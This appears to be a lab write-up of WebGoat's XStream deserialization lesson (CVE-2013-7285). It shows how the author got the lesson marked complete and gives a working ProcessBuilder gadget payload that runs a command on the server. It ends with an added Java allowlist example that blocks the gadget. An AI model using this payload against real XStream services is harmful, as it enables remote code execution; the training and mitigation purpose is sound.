WebGoat Vulnerable Components 12

PVXs
3 min read, Oct 5, 2020


WebGoat Vulnerable Components lesson 12

This lesson is about the exploitation of the XStream vulnerability CVE-2013-7285 (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285).

CVE-2013-7285 is a Remote Code Execution vulnerability: XStream allows the creation of arbitrary Java objects during deserialization, so it is possible to instantiate a java.lang.ProcessBuilder and execute a command with the privileges of the current Java application.

But unfortunately getting this lesson completed and exploiting CVE-2013-7285 are not the same thing.

1 — Getting the lesson completed

After reading WebGoat GitHub sources

some more reading of everything I could find on the web

and finally watching this YouTube video from “PenTester 123”

while trying various payloads, I had serious doubts about the consistency between the WebGoat GitHub sources and what was actually running on my WebGoat instance.

So I got hold of Java Decompiler (http://java-decompiler.github.io/).

Copying webgoat.jar from docker

Copied the WebGoat jar from the server currently running the docker container.

webgoat.jar on Java Decompiler

Opened it with Java Decompiler.

Here it is clear that, to get the lesson marked as completed, it is sufficient to make the ConversionException message contain the string “Integer”.

So, by putting this payload in the text area, the lesson is completed:

<contact>
<Integer>5</Integer>
</contact>

2 — Exploiting CVE-2013–7285 on WebGoat Vulnerable Components lesson

I based my solution on this blog post

and the XML payload present in its “Increasing the success likelihood” section.

To get some proof that the solution was working, I wanted to create a file, but none of the input/output redirections worked.

I added a second <string> XML element in the command section; by doing so I created an “xyz” file in the home directory of the “webgoat” user running

Here is my payload:

<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>touch</string><string>xyz</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>

And here is what happens on the docker WebGoat machine before and after running the XML payload; the payload was submitted and executed on the lesson page between the two “ls” commands.

A wild xyz file appears
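The mitigation side of this, as an added example that is not WebGoat's or XStream's own code: an XStream instance configured with the deny-all type allowlist that XStream 1.4.7 and later provide, which refuses the gadget shape shown above (sorted-set / dynamic-proxy / EventHandler / ProcessBuilder) before any object is built, while still parsing the expected contact document. The Contact class is a hypothetical stand-in for the lesson's contact type, and the gadget sample is constructed here with a harmless command.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class XStreamAllowlistDemo {
    // Hypothetical stand-in for the lesson's contact type; not WebGoat's own class.
    public static class Contact {
        String name;
        int age;
    }

    // Deny-all XStream instance that only accepts the types the application expects.
    static XStream hardenedXStream() {
        XStream xstream = new XStream();
        xstream.addPermission(NoTypePermission.NONE);              // forbid every type
        xstream.addPermission(NullPermission.NULL);                // then re-allow null ...
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES); // ... and primitives
        xstream.allowTypes(new Class[] { Contact.class, String.class });
        xstream.alias("contact", Contact.class);
        return xstream;
    }

    // Returns the parsed object, or null when XStream refuses the document.
    static Object tryParse(XStream xstream, String xml) {
        try {
            return xstream.fromXML(xml);
        } catch (XStreamException e) {
            // A type outside the allowlist surfaces here as ForbiddenClassException,
            // raised on the outer <sorted-set> (java.util.TreeSet) before any gadget runs.
            System.out.println("rejected: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        String benign = "<contact><name>alice</name><age>30</age></contact>";
        // Constructed sample with the same gadget shape as the post's payload,
        // but with a harmless command so the demo does nothing even if it failed.
        String gadget = "<sorted-set><string>foo</string><dynamic-proxy>"
            + "<interface>java.lang.Comparable</interface>"
            + "<handler class=\"java.beans.EventHandler\">"
            + "<target class=\"java.lang.ProcessBuilder\">"
            + "<command><string>true</string></command></target>"
            + "<action>start</action></handler></dynamic-proxy></sorted-set>";
        XStream hardened = hardenedXStream();
        System.out.println("benign accepted: " + (tryParse(hardened, benign) != null));
        System.out.println("gadget accepted: " + (tryParse(hardened, gadget) != null));
    }
}
```

Note that the lesson's check keys on a ConversionException message; a hardened parser throws a ForbiddenClassException instead, which is the exception type the application should log and treat as hostile input.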

This concludes WebGoat Vulnerable Components 12

I hope you liked it.

PVXs — https://twitter.com/pivixih
